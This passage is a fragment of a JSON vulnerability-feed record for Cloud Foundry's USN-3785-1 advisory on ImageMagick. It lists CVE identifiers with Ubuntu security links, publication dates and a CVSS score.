[CVE-2018-14435](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14435>)\n * [CVE-2018-14436](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14436>)\n * [CVE-2018-14437](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14437>)\n * [CVE-2018-14551](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-14551>)\n * [CVE-2018-16323](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16323>)\n * [CVE-2018-16640](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16640>)\n * [CVE-2018-16642](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16642>)\n * [CVE-2018-16643](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16643>)\n * [CVE-2018-16644](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16644>)\n * [CVE-2018-16645](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16645>)\n * [CVE-2018-16749](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16749>)\n * [CVE-2018-16750](<https://people.canonical.com/~ubuntu-security/cve/CVE-2018-16750>)\n", "modified": "2018-10-09T00:00:00", "published": "2018-10-09T00:00:00", "id": "CFOUNDRY:D716827DA44D41333F3C4C92A77A0B32", "href": "https://www.cloudfoundry.org/blog/usn-3785-1/", "title": "USN-3785-1: ImageMagick vulnerabilities | Cloud Foundry", "type": "cloudfoundry", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
